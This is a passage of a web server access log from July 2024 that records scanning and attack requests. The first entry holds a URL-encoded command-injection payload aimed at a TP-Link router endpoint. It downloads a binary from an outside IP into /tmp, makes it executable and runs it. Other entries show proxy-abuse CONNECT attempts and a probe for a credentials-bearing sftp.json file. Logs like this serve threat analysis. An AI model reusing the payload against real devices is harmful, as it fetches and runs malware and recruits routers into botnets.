/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 185.191.126.213 - - [04/Jul/2024:23:10:50 +0200] "GET / HTTP/1.1" 200 1895 80.76.49.130 - - [04/Jul/2024:23:23:39 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 106.75.174.148 - - [04/Jul/2024:23:24:19 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 739 87.121.69.27 - - [04/Jul/2024:23:36:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804